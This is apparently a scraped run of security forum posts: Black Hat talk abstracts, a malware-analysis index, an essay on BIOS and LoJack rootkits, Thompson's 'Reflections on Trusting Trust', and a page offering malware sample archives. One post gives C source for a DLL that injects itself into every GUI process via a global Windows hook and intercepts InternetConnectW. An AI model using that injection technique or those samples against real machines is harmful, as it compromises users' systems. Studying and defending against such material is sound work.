    [h=1]Analyzing Unknown Malware[/h] [h=3]#1 Dropper of kernel-mode stealer[/h][h=3]#Offtopic The case of the gethostbyname() exception[/h][h=3]#2 Disclosure of an interesting Botnet - The Executable (Part 1)[/h][h=3]#2 Disclosure of an interesting Botnet - The Server (Part 2)[/h][h=3]#3 Disclosure of another 0day malware - Initial Dropper and Downloader (Part 1)[/h][h=3]#3 Disclosure of another 0day malware - Analysis of 2nd Dropper and 3rd Dropper (Part 2)[/h][h=3]#3 Disclosure of another 0day malware - Analysis of the final Payload (Part 3)[/h][h=3]#3 Disclosure of another 0day malware - Update and Additional Information[/h][h=3]#4 Analysis of an uncommon Downloader[/h][h=3]#5 South Korea Incident - New Malware samples[/h][h=3]#6 South Korea Incident - Analysis of a tiny Downloader[/h][h=3]#7 Brief description of a signed Adware/PUP Downloader[/h][h=3]#8 Back to the future - Analysis of an old Downloader[/h] Sursa: Analyzing Unknown Malware
  9. Nytro
    Blackhat Eu 2013 - Hacking Video Conferencing Systems Description: High-end videoconferencing systems are widely deployed at critical locations such as corporate meeting rooms or boardrooms. Many of these systems are reachable from the Internet or via the telephone network while in many cases the security considerations are limited to the secure deployment and configuration. We conducted a case study on Polycom HDX devices in order to assess the current state of security on those devices. After analyzing the software update file format and showing how to get system level access to the otherwise closed devices we describe how to setup a proper vulnerability development environment which lays the groundwork for future security research. We demonstrate the feasibility of remotely compromising Polycom HDX devices over the network by implementing an exploit for one of the vulnerabilities we identified in the H.323 stack of the current software version which allows us to compromise even firewalled devices as long as the H.323 port is reachable. Our attack does not require the auto-answer feature for incoming calls to be turned on. We conclude with some thoughts about post-exploitation and describe possible ways to control attached peripherals such as the video camera and microphone which could be used to build a surveillance rootkit. For More Information please visit : - Black Hat | Europe 2013 - Briefings Sursa: Blackhat Eu 2013 - Hacking Video Conferencing Systems
  10. Nytro
    [h=1]Creating Global Api Hook Using Windows Hook[/h][h=3]zwclose7[/h] Windows hooks allows you to inject DLL into all GUI processes that are running in the same session. This allows you to inject a hook DLL into most running processes. Windows hooks can't inject DLL into system processes or service processes. I just written a hook DLL to show you how to use Windows hook to inject DLL into GUI processes. The DLL has a exported function, SetHook. Use the rundll32 tool to call execute this function. Once the function is executed, the function set the Windows hook, and inject the DLL into all GUI processes. When the DLL is injected, it hooks the InternetConnectW function to block all websites that contain the word "google" in the URL. To install the hook using the rundll32 tool, use the following command line: rundll32 <DllPath>,SetHook When the rundll32.exe process is terminated, the Windows hook is removed, and the hooked InternetConnectW is also unhooked. I am using my API hooking header for this project. #include <stdio.h>#include <Windows.h> #include <WinInet.h> #include "apihook.h" typedef HINTERNET (WINAPI *pInternetConnectW)(HINTERNET,LPCWSTR,INTERNET_PORT,LPCWSTR,LPCWSTR,DWORD,DWORD,DWORD_PTR); pInternetConnectW fnInternetConnectW; HINSTANCE hInst; API_HOOK Hook; extern "C" __declspec(dllexport) LRESULT CALLBACK CallWndProc(int nCode,WPARAM wParam,LPARAM lParam) { return CallNextHookEx(NULL,nCode,wParam,lParam); } extern "C" __declspec(dllexport) void SetHook() { SetWindowsHookEx(WH_CALLWNDPROC,CallWndProc,hInst,0); Sleep(INFINITE); } HINTERNET WINAPI HookInternetConnectW(HINTERNET hInternet,LPCWSTR ServerName,INTERNET_PORT InternetPort,LPCWSTR UserName,LPCWSTR Password,DWORD dwService,DWORD dwFlags,DWORD_PTR dwContext) { if(wcsstr(ServerName,L"google")) { OutputDebugString("Your request to access Google has been denied!"); SetLastError(ERROR_ACCESS_DENIED); return NULL; } return fnInternetConnectW(hInternet,ServerName,InternetPort,UserName,Password,dwService,dwFlags,dwContext); } BOOL WINAPI DllMain(HMODULE hModule,DWORD dwReason,LPVOID lpReserved) { char szModuleName[260],str[1024]; hInst=hModule; switch(dwReason) { case DLL_PROCESS_ATTACH: GetModuleFileName(NULL,szModuleName,260); sprintf(str,"Hook DLL loaded into process %s (%d)",szModuleName,GetCurrentProcessId()); OutputDebugString(str); InitAPIHook(&Hook,"wininet.dll","InternetConnectW",HookInternetConnectW); fnInternetConnectW=(pInternetConnectW)Hook.OrigFunction; StartAPIHook(&Hook); break; case DLL_PROCESS_DETACH: UnhookAPIHook(&Hook); RemoveAPIHook(&Hook); break; } return TRUE; } [h=4]Attached Thumbnails[/h] [h=4]Attached Files[/h] WindowsHook.zip 270.07KB 13 downloads Sursa: Creating Global Api Hook Using Windows Hook - Source Codes - rohitab.com - Forums
  11. Nytro
    [h=3]CentOS 6.4 Linux Installation Guide Step by Step[/h] Overview : This tutorial will help the system administrators to install CentOS 6.4 linux on Servers. Whereas CentOS (Community Enterprise Operating System) is a Linux distribution which attempts to provide a free enterprise class computing platform which has 100% binary compatibility with its upstream source, Red Hat Enterprise Linux (RHEL). Note : First download the ISO files (http://centos.mirror.net.in/centos/6.4/isos/x86_64/) for your respective Server's architecture and write the iso file to DVD. Installation Steps: Step:1 Set your Server's BIOS to boot from CD / DVD. Select Install or Upgrade existing system options as shown below : Step:2 Select Skip media test Step:3 Click on Next on welcome screen as shown below . Step:4 Select English & click on Next. Step:5 Select Appropirate keyboard ( U.S English in my Case). Click on Next Step:6 Select “Basic Storage Devices” option if you want to install OS locally on attached hard disk. Click on Next Step:7 Select “Yes , discard any data” Option as shown below Step:8 Set the Hostname and Click on “Configure Network” if you want to configure network during installation Step:9 Select the Time Zone with respect your Region Click on Next Step:10 Set the Root Password Click on Next Step:11 Select the Install Type , in my i am using “Use All Space”. If you want to create your own partition partition table , then select “Create Custom Layout” Option. Click on Next Step:12 Verify Partition Scheme and click on Next. Step:13 Click On the Format. Step:14 Click On “Write Changes to disk” Step:15 Set bootloader options. Click on next Step:16 Select the Software you want to Install , in my case i am using “Basic Server” Click On Next. Note : If want to select the software mannually , click on “Customize Now” and select your respective softwares. Step:17 Installation Started as shown below Step:18 Installation Completed , Reboot Your Server Now. Step:19 Welcome Login Screen (Run Level 3). Enter the user as root and enter password. Sursa: CentOS 6.4 Linux Installation Guide Step by Step
  12. Nytro
    Forwarded from: Marjorie Simmons <lawyer (at) marjoriesimmonsesq.com> A Friday muse for the equinox: As everyone not living under a rock now knows, the NSA is an APT (advanced persistent threat): "[t]hrough covert partnerships with tech companies, the spy agencies have inserted secret vulnerabilities into encryption software." http://www.theguardian.com/world/2013/sep/05/nsa-gchq-encryption-codes-security According to the materials The Guardian published online, in one of the briefings between the NSA and GCHQ to "celebrate their success at 'defeating network security and privacy'", the NSA's material states: "For the past decade, NSA has lead an aggressive, multi-pronged effort to break widely used Internet encryption technologies". The 'multi-pronged' language makes sense, since traditionally one doesn't simply rely on a single avenue of attack in an effort to undermine an enemy. So, in raping the sacred cow of crypto, what might one of the prongs be? What's least path of resistance? I had a recent reason to think about that, and decided on the BIOS. Awhile back I was close to someone who turned out to be a conspiracy-theorist, (and I had quite enough of that, thank you very much), but there are instances when the adage that "just because you're paranoid doesn't mean they're not out to get you" has a certain ring of truth to it. (I imagine all the conspiracy-theorists threw a "there is a god!" party when The Guardian published the recent news.) In the last few weeks I was offered a BIOS update for an x64 i7 notebook built in 2011 which runs Windows 7. The BIOS is set up to optionally use UEFI (Unified Extensible Firmware Interface) boot mode, which on this machine is disabled by default. It also has an option for enabling Intel's AMT (Active Management Technology), which is enabled by default and has an option to disable it, but no option to enable or disable the similar and dependant Computrace/LoJack anti-theft functions that are also burned into BIOS by the manufacturer. I knew this machine had the LoJack modifications to the BIOS chip because the hardware manufacturer's security software offers the use of LoJack within security setup once the user is already within the OS. Given the well-documented security threat that LoJack presents, one wants to disable it but cannot do so easily as one can with the precursor AMT, which is (or at least appears to be) more transparent. You never know though: Researchers can slip an undetectable trojan into Intel's Ivy Bridge CPUs, http://arstechnica.com/security/2013/09/researchers-can-slip-an-undetectable-trojan-into-intels-ivy-bridge-cpus/. For those unaware, the Computrace/LoJack product is anti-theft tracking software that periodically connects to Absolute Software's servers (the makers/licensors of LoJack) to announce its location and to check to see if the machine has been reported stolen. It can report such things, besides georeferencing, as installed software and encryption status, and perform file retrieval. (http://www3.absolute.com/Shared/Datasheets/CT-MX-E.sflb.ashx) The smart people who hacked it show how it can be reconfigured to further undesirable ends, see Deactivate the rootkit - Black Hat Vegas 2009 - Exploiting Stuff: http://web.archive.org/web/20120316214910/http://exploiting.wordpress.com/2009/09/11/138/, and The BIOS-Embedded Anti-Theft Persistent Agent that Couldn't: Handling the Ostrich Defense - Core Security Technologies http://web.archive.org/web/20120226125347/http://blog.coresecurity.com/2009/08/11/the-bios-embedded-anti-theft-persistant-agent-that -couldnt-response-handling-the-ostrich-defense/. LoJack (and some of its competitors products, of which there aren't many) comes preinstalled in the BIOS of Acer, Asus, Dell, Fujitsu, Gateway, HP, Lenovo, Panasonic, Samsung, and Toshiba machines, among others, (product partners with model numbers are listed at http://www.absolute.com/en/partners/bios-compatibility.aspx, Intel's anti-theft partners for consumer machines, including LoJack, are at http://www.intel.com/content/www/us/en/architecture-and-technology/anti-theft/anti-theft-service-providers.html and for business ,including Computrace, are at http://www.intel.com/content/www/us/en/architecture-and-technology/anti-theft/anti-theft-service-providers-enterprise.html; notebook models supported are listed in http://www.intel.com/content/dam/www/public/us/en/documents/datasheets/anti-theft-tested-platforms-support-datasheet.pdf). While it wouldn't make economic sense for Absolute to track a machine whose owner hasn't paid the licensing fee, any rootkit exploiting LoJack's weaknesses in the BIOS implementation would find it a neat way to own a machine while bypassing all OS-level protections, directing in-and-outbound traffic through servers of their choice. I'm confident the BIOS geeks at the NSA are tickled pink with it and are all up in its stuff, especially given the documented ownability of it -- because it makes codebreaking unnecessary. Fifteen years ago the Chernobyl virus targeted systems' BIOS causing an estimated $1 billion US dollars in commercial damages alone, as for Stuxnet, though eschewing the BIOS in favor of a badass PLC, who knows its ultimate costs? The damage that an effective rootkit using BIOS or targeting chipsets could do, now, is staggering, when you think about it. There's been plenty of time for the NSA to consider the possibilities, and plenty of incentive given the demographic of millions of Computrace/LoJack-affected machines lying in wait for the cloak and dagger crowd to work their magic. LoJack is enabled on notebooks by default, currently working through architecture like Intel's AMT, and stays 'dormant' until one purchases a license for it (I didn't), at which point Absolute's software will instruct the affected BIOS to copy an existing downloader from the BIOS flash ROM (usually named rpcnetp.exe) to %WINDIR%\System32; on some machines rpcnetp.exe is preinstalled with the OS on the unit's hard drive prior to shipment from the factory. When activated, rpcnetp.exe downloads the agent rpcnet.exe and installs it as a service. The enable/disable state of the persistence module is stored in a part of the BIOS that cannot be flashed to remove it, and in this way provides a no-touch method for it being a primary and persistent threat tool if it is compromised. (http://www.absolute.com/en/resources/faq/absolute-computrace-technology). Presumably, disabling AMT disables the vehicle which drives the LoJack functions, but since Intel's Ivy Bridge has already been compromised, LoJack could still jack a box with a compromised Ivy Bridge even if it or AMT is showing "disabled" in a BIOS. UEFI, a specification defining a software interface between an operating system and platform firmware, at the same time offers an architecture to build better security but also presents a common base for targeting attacks. (Analysis of the building blocks and attack vectors associated with the UEFI, https://www.sans.org/reading-room/whitepapers/services/analysis-building-blocks-attack-vectors-unified-extensible-firmware-34215?sho w=analysis-building-blocks-attack-vectors-unified-extensible-firmware-34215&cat=services.) UEFI has many detractors because it takes the control of machine out of the hands of its owner, for instance, Ronald Minnich (co-author of coreboot) and Cory Doctorow have continually criticized EFI as an attempt to remove the ability of a computer's owner to truly control it. (https://archive.fosdem.org/2007/interview/ronald+g+minnich) Of course, for Windows 8, Microsoft's certification requirements require that computers' firmware implement UEFI, and if they support 'Connected Standby' in Windows 8, then the firmware isn't allowed to contain a compatibility mode, so systems supporting connected standby are not capable of booting 'legacy' BIOS-type operating systems: "An OEM may not ship a 64-bit system which defaults to legacy BIOS or loads legacy option ROMs if that system ships with a UEFI-compatible OS", nor can they indicate connectivity in standby mode: "Systems that support Connected Standby must not include a light indicating the status of the radios in the system", (ostensibly in order to conserve energy); and a "LAN device on systems that support Connected Standby must deliver reliable connectivity in Connected Standby" because "[t]he intent of a system that supports connected standby is that it is always connected to the cloud, whether the system is fully powered or in connected standby". (http://web.archive.org/web/20120802023617/http://msdn.microsoft.com/en-us/library/windows/hardware/jj128256.aspx) I'm confident the UEFI programmers at the NSA are delighted about this, because if they can compromise a Windows 8 machine running Computrace/LoJack, they can perform I/O operations while the machine is in connected standby with no indication to the user or to OS-dependent anti-malware programs of their traffic. So I look at this machine and then at my Linux machines and think it really is past time to ditch Windows entirely, but I need to use it because clients use Windows software that I can't run under Wine, and I can't pry them off Windows, though I've tried. Linux though, is also vulnerable to pre-OS attacks in a similar way. This machine also has, like my Linux AMD boxes, a BIOS option of using ACPI (Advanced Configuration and Power Interface) for SATA. ACPI has its own high-level interpreted language that can readily be used to code a rootkit and store key attack functions in the BIOS. Six years ago John Heasman documented this in his presentation at LayerOne on BIOS rootkits. (Researchers: Rootkits headed for BIOS, http://web.archive.org/web/20080724122321/http://www.securityfocus.com/news/11372 and see his presentation .) Heasman also presented at BlackHat the same year, Hacking the Extensible Firmware Interface, http://web.archive.org/web/20091211100105/http://www.ngssoftware.com/research/papers/BH-VEGAS-07-Heasman.pdf. (See alsoPersistent BIOS infection at CanSecWest 2009 http://exploiting.wordpress.com/2009/03/23/cansecwest-was-great-here-the-presentation-slides/ and http://www.theregister.co.uk/2009/03/24/persistent_bios_rootkits/.) Although ACPI is a platform-independent open technology standard, its implementation is most often closed source, and with the 'covert partnerships' the NSA has a history of making with vendors, I'm confident the NSA's ACPI programmers are seeing what they can make of ACPI's usefulness even in its basic features, including in Linux, such as elevating privileges and reading physical memory, using their own procedures that replace legitimate functions stored in flash memory, and other such treats. (See, Researcher creates proof-of-concept malware that infects BIOS, network cards, http://www.cso.com.au/article/432041/researcher_creates_proof-of-concept_malware_infects_bios_network_cards/, What You Need to Know About Linux Rootkits, http://www.linuxsecurity.com/content/view/154709/171/; and, Ultimate PC security requires UEFI -- and Windows 8 or Linux, http://www.infoworld.com/d/security/ultimate-pc-security-requires-uefi-and-windows-8-or-linux-215048.) Because through all the usual and some creative means I wasn't able to update the BIOS on this machine, the situation occasioned a call to the vendor's support line and ultimately they decided the machine needed a new motherboard. Though I told the (major market-player) vendor I wanted a board without the LoJack mods to the BIOS, they said they would try but couldn't guarantee I'd get a clean board. This was like reminding them the machine is still under warranty so they must provide a new board and not a remanufactured one, and they say, "We'll try ...". I sigh realizing that Linux or Windows or Mac, it doesn't matter. Without an easy and timely method to hash a BIOS for everyone to make sure it hasn't been modified with unwanted instructions, and without open source hardware industry standards that are implemented as a matter of course in a transparent manner, the NSA and its far flung equivalents will continue to be an advanced persistent threat and all our BIOS is belong to them. ### -- Find the best InfoSec talent without breaking your recruiting budget! Post a Job, $99 for 31 days. Hot InfoSec Jobs - http://www.hotinfosecjobs.com/
  13. Nytro
    Blackhat Eu 2013 - A Perfect Crime? Only Time Will Tell Description: On 2012, security researchers shook the world of security with their CRIME attack against the SSL encryption protocol. CRIME (Compression Ratio Info-leak Made Easy) attack used an inherent information leakage vulnerability resulting from the HTTP compression usage to defeat SSL’s encryption. However, the CRIME attack had two major practical drawbacks. The first is the attack threat model: CRIME attacker is required to control the plaintext AND to be able to intercept the encrypted message. This attack model limits the attack to mostly MITM (Man In The Middle) situation. The second issue is the CRIME attack was solely aimed at HTTP requests. However, most of the current web does not compress HTTP requests. The few protocols that did support HTTP requests compression (SSL compression and SPDY) had dropped their support following the attack details disclosure, by thus rendering the CRIME attack irrelevant. In our work we address these two limitations by introducing the TIME (Timing Info-leak Made Easy) attack for HTTP responses. By using timing information differential analysis to infer on the compressed payload’s size, the CRIME attack’s attack model can be simplified and its requirements can be loosened. In TIME’s attack model the attacker only needs to control the plaintext, theoretically allowing any malicious site to launch a TIME attack against its innocent visitors, to break SSL encryption and/or Same Origin Policy (SOP). Changing the target of the attack from HTTP requests to HTTP responses significantly increases the attack surface, as most of the current web utilizes HTTP response compression to save bandwidth and latency. In particular, we: Introduce the TIME attack Show an actual POC of timing differential analysis to infer on the compressed payload’s size and subsequently the cipher-text’s underlying plaintext Show the relevancy of compression ratio information leakage for HTTP responses Suggest mitigation steps against the TIME attack For More Information please visit : - Black Hat | Europe 2013 - Briefings Sursa: Blackhat Eu 2013 - A Perfect Crime? Only Time Will Tell
  14. Nytro
    [h=1]3D-Printed Robot Cracks Your Android PIN Code[/h] Using a PIN to lock your Android phone will keep it safe from most people, but not from R2B2 — a robot designed to brute-force its way through any four-digit code in less than a day. R2B2, the Robotic Reconfigurable Button Basher, is the invention of Justin Engler — a senior security engineer at New York-based iSEC Partners. The robot has debuted on YouTube in advance of its appearance at the Black Hat security conference in Las Vegas. Instead of using sophisticated software to crack Android PINs, R2B2 adopts the tried-and-true method of entering every possible combination until something clicks. In hacking, this method is known as a "brute-force" attack, but R2B2 is unique in that it exhibits brute-force behavior in real life rather than digitally. The robot — four yellow manipulators that control a central appendage, resting atop two "legs" — can sit atop an Android phone and simply press buttons over and over again. There are 10,000 possible four-digit PINs — a relatively small number, but still too many for one human to work through. R2B2, on the other hand, has no need for food, sleep or mental stimulation, and can work through every possible PIN in just 20 hours. If a user enters five incorrect PINs in a row, the Android OS enforces a 30-second waiting period before the person can try again — but that is the only disincentive. This is why R2B2 wouldn't work on iOS devices: Apple employs an iterative system that makes a user wait increasingly longer to retry after each incorrect PIN entry. You can actually create your own R2B2, if you want. The robot is the result of open-source software, a few cheap electronics and a standard MakerBot 3D printer, reports Forbes. In fact, apart from the electronic components, the entire robot was 3D-printed. The robot's legs, central stand and "finger" apparatus all came from a 3D printer. Engler plans to release all of his blueprints within the next few weeks, which means that anyone in need of a neat party trick can print and cobble together his or her own R2B2. Though R2B2 is a novel device, it doesn't pose much of a security risk. No one is likely to leave his or her Android phone beneath a very distinctive robot for 20 hours straight, and even if someone did, the robot wouldn't be able to inflict any harm because all it can do is guess PINs. What R2B2 does demonstrate, though, is that PINs aren't a foolproof security measure, especially compared to pattern- and password-based methods. Additionally, Android could take a page out of the iOS playbook when it comes to locking out potential malefactors. Image: Mashable This article originally published at TechNewsDaily here Sursa: 3D-Printed Robot Cracks Your Android PIN Code
  15. Nytro

    Fun stuff

    Nytro replied to Wisa's topic in Discutii non-IT

    Am aflat cu monitorizeaza NSA-ul pe toata lumea. http://www.southparkstudios.com/full-episodes/s17e01-let-go-let-gov Atat de simplu si atat de eficient...
  16. Nytro
    Malware archives [h=3]Warning! Warning! Warning! Warning! Warning![/h] Malware samples are available for download by any responsible whitehat researcher. By downloading the samples, anyone waives all rights to claim punitive, incidental and consequential damages resulting from mishandling or self-infection. If you do not know what you are doing here, it is recommended you leave right away. This page has no commercial purpose. Contact me via email for the passwords (specifying all or single archive). If you see errors, typos, etc, please let me know. [h=3]Notes about the collection of binaries[/h] Honeypot ISP: AS3269 Interbusiness (Telecom Italia) Honeypot software: amun, dionaea Total files: 7085 Period of time: Aug 2009 - Feb 2013 Type of files: ASCII, data, HTML, MS-DOS, PE32 (dll, gui, Mono/.Net) [TABLE=class: table table-bordered table-striped] [TR] [TH]Archive[/TH] [TH]List[/TH] [TH]#[/TH] [TH]Download[/TH] [TH]Size[/TH] [/TR] [TR] [TD]nothink-malware-archive-0.zip[/TD] [TD]list-md5-0.txt[/TD] [TD]445[/TD] [TD]link[/TD] [TD]50M[/TD] [/TR] [TR] [TD]nothink-malware-archive-1.zip[/TD] [TD]list-md5-1.txt[/TD] [TD]411[/TD] [TD]link[/TD] [TD]50M[/TD] [/TR] [TR] [TD]nothink-malware-archive-2.zip[/TD] [TD]list-md5-2.txt[/TD] [TD]456[/TD] [TD]link[/TD] [TD]60M[/TD] [/TR] [TR] [TD]nothink-malware-archive-3.zip[/TD] [TD]list-md5-3.txt[/TD] [TD]440[/TD] [TD]link[/TD] [TD]58M[/TD] [/TR] [TR] [TD]nothink-malware-archive-4.zip[/TD] [TD]list-md5-4.txt[/TD] [TD]421[/TD] [TD]link[/TD] [TD]62M[/TD] [/TR] [TR] [TD]nothink-malware-archive-5.zip[/TD] [TD]list-md5-5.txt[/TD] [TD]456[/TD] [TD]link[/TD] [TD]57M[/TD] [/TR] [TR] [TD]nothink-malware-archive-6.zip[/TD] [TD]list-md5-6.txt[/TD] [TD]485[/TD] [TD]link[/TD] [TD]69M[/TD] [/TR] [TR] [TD]nothink-malware-archive-7.zip[/TD] [TD]list-md5-7.txt[/TD] [TD]441[/TD] [TD]link[/TD] [TD]59M[/TD] [/TR] [TR] [TD]nothink-malware-archive-8.zip[/TD] [TD]list-md5-8.txt[/TD] [TD]449[/TD] [TD]link[/TD] [TD]63M[/TD] [/TR] [TR] [TD]nothink-malware-archive-9.zip[/TD] [TD]list-md5-9.txt[/TD] [TD]466[/TD] [TD]link[/TD] [TD]63M[/TD] [/TR] [TR] [TD]nothink-malware-archive-a.zip[/TD] [TD]list-md5-a.txt[/TD] [TD]437[/TD] [TD]link[/TD] [TD]56M[/TD] [/TR] [TR] [TD]nothink-malware-archive-b.zip[/TD] [TD]list-md5-b.txt[/TD] [TD]427[/TD] [TD]link[/TD] [TD]64M[/TD] [/TR] [TR] [TD]nothink-malware-archive-c.zip[/TD] [TD]list-md5-c.txt[/TD] [TD]448[/TD] [TD]link[/TD] [TD]59M[/TD] [/TR] [TR] [TD]nothink-malware-archive-d.zip[/TD] [TD]list-md5-d.txt[/TD] [TD]435[/TD] [TD]link[/TD] [TD]51M[/TD] [/TR] [TR] [TD]nothink-malware-archive-e.zip[/TD] [TD]list-md5-e.txt[/TD] [TD]441[/TD] [TD]link[/TD] [TD]51M[/TD] [/TR] [TR] [TD]nothink-malware-archive-f.zip[/TD] [TD]list-md5-f.txt[/TD] [TD]427[/TD] [TD]link[/TD] [TD]57M[/TD] [/TR] [/TABLE] Sursa: Nothink.org
  17. Nytro
    Browser Pivoting (Two-Factor Auth? Hah!) Description: A Browser Pivot is a way to inherit a user's access to sites by relaying requests through their browser. This man-in-the-browser capability gives pen testers a way to go around 2FA and demonstrate risk--even in high security environments. Browser Pivoting - Cobalt Strike Sursa: Browser Pivoting (Two-Factor Auth? Hah!)
  18. Nytro
    Blackhat Eu 2013 - Advanced Heap Manipulation In Windows 8 Description: With the introduction of Windows 8, previously public known heap/kernel pool overflow exploitation techniques are dead because of exploit mitigation improvements. There are indications that compromising application speci?c data, which are facilitated by heap manipulation, are getting more popular for future exploitation. How to deterministically predict the heap state in great possible level? Tradition manipulation technique (both kernel pool and user heap) is to consistently defragment the heap which makes future allocations adjacent afterwards, and then make holes in these allocations to let the vulnerable buffer, which with similar size, fall into one of them. In the user heap a new LFH allocator was introduced, the randomized alloc/free and guard pages made this technique tough to work. Beyond that, the traditional technique has some limitations such as the size of the vulnerable buffer and the type of data structure that could be chosen as attacking target (especially in kernel pool), which together make it cannot be considered as a generic solution any more. This talk is aimed to provide an advanced method on precisely manipulating heap layout (kernel pool and user heap) by standing on the giant’s shoulder: “Heap Feng Shui”. Arbitrary sized vulnerable buffer could be covered with our more generic method which paves the way toward further interesting discoveries for security researchers. A reliable demo will be explained at the end of this section. By setting up the heap in a controlled state, some specific vulnerability scenarios could be exploited easily and reliably. In the following practical sections, this talk will then divided into two parts: 1: Kernel pool: I will show how to plant a desired kernel object into a fixed known address, and then demo exploit against write-what-where vulnerability scenarios. Furthermore, some attacks which need the sufficient control of the kernel pool and precise size information (eg: “block size attack” brought by Tarjei in his BH USA 2012 talk) may utilize this research. I will also show how carefully crafted kernel pool layout combined with application data corruption could lead to reliable exploit in kernel pool overflow scenarios. 2: User heap: I will discuss the possibility of heap determinism in Windows 8 user heap, and use demo to prove that: reliable heap exploitation is still achievable in some circumstance with proper heap layout crafting. Presented By: Zhenhua 'Eric' Liu For More Information please visit : - Black Hat | Europe 2013 - Briefings Sursa: Blackhat Eu 2013 - Advanced Heap Manipulation In Windows 8
  19. Nytro
    Ken Thompson's "cc hack" - Presented in the journal, Communication of the ACM, Vol. 27, No. 8, August 1984, in a paper entitled "Reflections on Trusting Trust", Ken Thompson, co-author of UNIX, recounted a story of how he created a version of the C compiler that, when presented with the source code for the "login" program, would automatically compile in a backdoor to allow him entry to the system. This is only half the story, though. In order to hide this trojan horse, Ken also added to this version of "cc" the ability to recognize if it was recompiling itself to make sure that the newly compiled C compiler contained both the "login" backdoor, and the code to insert both trojans into a newly compiled C compiler. In this way, the source code for the C compiler would never show that these trojans existed. Reflections on Trusting Trust by Ken Thompson Introduction I thank the ACM for this award. I can't help but feel that I am receiving this honor for timing and serendipity as much as technical merit. UNIX swept into popularity with an industry-wide change from central main frames to autonomous minis. I suspect that Daniel Bobrow (1) would be here instead of me if he could not afford a PDP-10 and ad had to "settle" for a PDP-11. Moreover, the current state of UNIX is the result of the labors of a large number of people. There is an old adage, "Dance with the one that brought you," which means that I should talk about UNIX. I have not worked on mainstream UNIX in many years, yet I continue to get undeserved credit for the work of others. Therefore, I am not going to talk about UNIX, but I want to thank everyone who has contributed. That brings me to Dennis Ritchie. Our collaboration has been a thing of beauty. In the ten years that we have worked together, I can recall only one case of miscoordination of work. On that occasion, I discovered that we both had written the same 20-line assembly language program. I compared the sources and was astounded to find that they matched character-for-character. The result of our work together has been far greater than the work that we each contributed. I am a programmer. On my 1040 form, that is what I put down as my occupation. As a programmer, I write programs. I would like to present to you the cutest program I ever wrote. I will do this in three stages and try to bring it together at the end. Stage I In college, before video games, we would amuse ourselves by posing programming exercises. One of the favorites was to write the shortest self-reproducing program. Since this is an exercise divorced from reality, the usual vehicle was FORTRAN. Actually, FORTRAN was the language of choice for the same reason that three-legged races are popular. More precisely stated, the problem is to write a source program that, when compiled and executed, will produce as output an exact copy of its source. If you have never done this, I urge you to try it on your own. The discovery of how to do it is a revelation that far surpasses any benefit obtained by being told how to do it. The part about "shortest" was just an incentive to demonstrate skill and determine a winner. FIGURE 1 Figure 1 shows a self-reproducing program in the C programming language. (The purist will note that the program is not precisely a self-reproducing program, but will produce a self-reproducing program.) This entry is much too large to win a prize, but it demonstrates the technique and has two important properties that I need to complete my story: (I) This program can be easily written by another program. (2) This pro- gram can contain an arbitrary amount of excess baggage that will be reproduced along with the main algorithm. In the example, even the comment is reproduced. Stage II The C compiler is written in C. What I am about to describe is one of many "chicken and egg" problems that arise when compilers are written in their own language. In this ease, I will use a specific example from the C compiler. C allows a string construct to specify an initialized character array. The individual characters in the string can be escaped to represent unprintable characters. For example, "Hello world\n" represents a string with the character "\n," representing the new line character. FIGURE 2 Figure 2 is an idealization of the code in the C compiler that interprets the character escape sequence. This is an amazing piece of code. It "knows" in a completely portable way what character code is compiled for a new line in any character set. The act of knowing then allows it to recompile itself, thus perpetuating the knowledge. FIGURE 3 Suppose we wish to alter the C compiler to include the sequence "\v" to represent the vertical tab character. The extension to Figure 2 is obvious and is presented in Figure 3. We then recompile the C compiler, but we get a diagnostic. Obviously, since the binary version of the compiler does not know about "\v," the source is not legal C. We must "train" the compiler. After it "knows" what "\v" means, then our new change will become legal C. We look up on an ASCII chart that a vertical tab is decimal 11. We alter our source to look like Figure 4. Now the old compiler accepts the new source. We install the resulting binary as the new official C compiler and now we can write the portable version the way we had it in Figure 3. FIGURE 4 This is a deep concept. It is as close to a "learning" program as I have seen. You simply tell it once, then you can use this self-referencing definition. Stage III FIGURE 5 Again, in the C compiler, Figure 5 represents the high-level control of the C compiler where the routine "compile" is called to compile the next line of source. Figure 6 shows a simple modification to the compiler that will deliberately miscompile source whenever a particular pattern is matched. If this were not deliberate, it would be called a compiler "bug." Since it is deliberate, it should be called a "Trojan horse." FIGURE 6 The actual bug I planted in the compiler would match code in the UNIX "login" command. The replacement code would miscompile the login command so that it would accept either the intended encrypted password or a particular known password. Thus if this code were installed in binary and the binary were used to compile the login command, I could log into that system as any user. Such blatant code would not go undetected for long. Even the most casual perusal of the source of the C compiler would raise suspicions. FIGURE 7 The final step is represented in Figure 7. This simply adds a second Trojan horse to the one that already exists. The second pattern is aimed at the C compiler. The replacement code is a Stage I self-reproducing program that inserts both Trojan horses into the compiler. This requires a learning phase as in the Stage II example. First we compile the modified source with the normal C compiler to produce a bugged binary. We install this binary as the official C. We can now remove the bugs from the source of the compiler and the new binary will reinsert the bugs whenever it is compiled. Of course, the login command will remain bugged with no trace in source anywhere. Moral The moral is obvious. You can't trust code that you did not totally create yourself. (Especially code from companies that employ people like me.) No amount of source-level verification or scrutiny will protect you from using untrusted code. In demonstrating the possibility of this kind of attack, I picked on the C compiler. I could have picked on any program-handling program such as an assembler, a loader, or even hardware microcode. As the level of program gets lower, these bugs will be harder and harder to detect. A well installed microcode bug will be almost impossible to detect. After trying to convince you that I cannot be trusted, I wish to moralize. I would like to criticize the press in its handling of the "hackers," the 414 gang, the Dalton gang, etc. The acts performed by these kids are vandalism at best and probably trespass and theft at worst. It is only the inadequacy of the criminal code that saves the hackers from very serious prosecution. The companies that are vulnerable to this activity (and most large companies are very vulnerable) are pressing hard to update the criminal code. Unauthorized access to computer systems is already a serious crime in a few states and is currently being addressed in many more state legislatures as well as Congress. There is an explosive situation brewing. On the one hand, the press, television, and movies make heroes of vandals by calling them whiz kids. On the other hand, the acts performed by these kids will soon be punishable by years in prison. I have watched kids testifying before Congress. It is clear that they are completely unaware of the seriousness of their acts. There is obviously a cultural gap. The act of breaking into a computer system has to have the same social stigma as breaking into a neighbor's house. It should not matter that the neighbor's door is unlocked. The press must learn that misguided use of a computer is no more amazing than drunk driving of an automobile. Acknowledgment I first read of the possibility of such a Trojan horse in an Air Force critique (4) of the security of an early implementation of Multics. I can- not find a more specific reference to this document. I would appreciate it if anyone who can supply this reference would let me know. References Bobrow, D.G., Burchfiel, J.D., Murphy, D.L., and Tomlinson, R.S. TENEX, a paged time-sharing system for the PDP-IO. Commun. ACM 15, 3 (Mar. 1972), 135-143. Kernighan, B.W., and Ritchie, D.M. The C Programming Language. Prentice-Hall, Englewood Cliffs, N.J., 1978. Ritchie, D.M., and Thompson, K. The 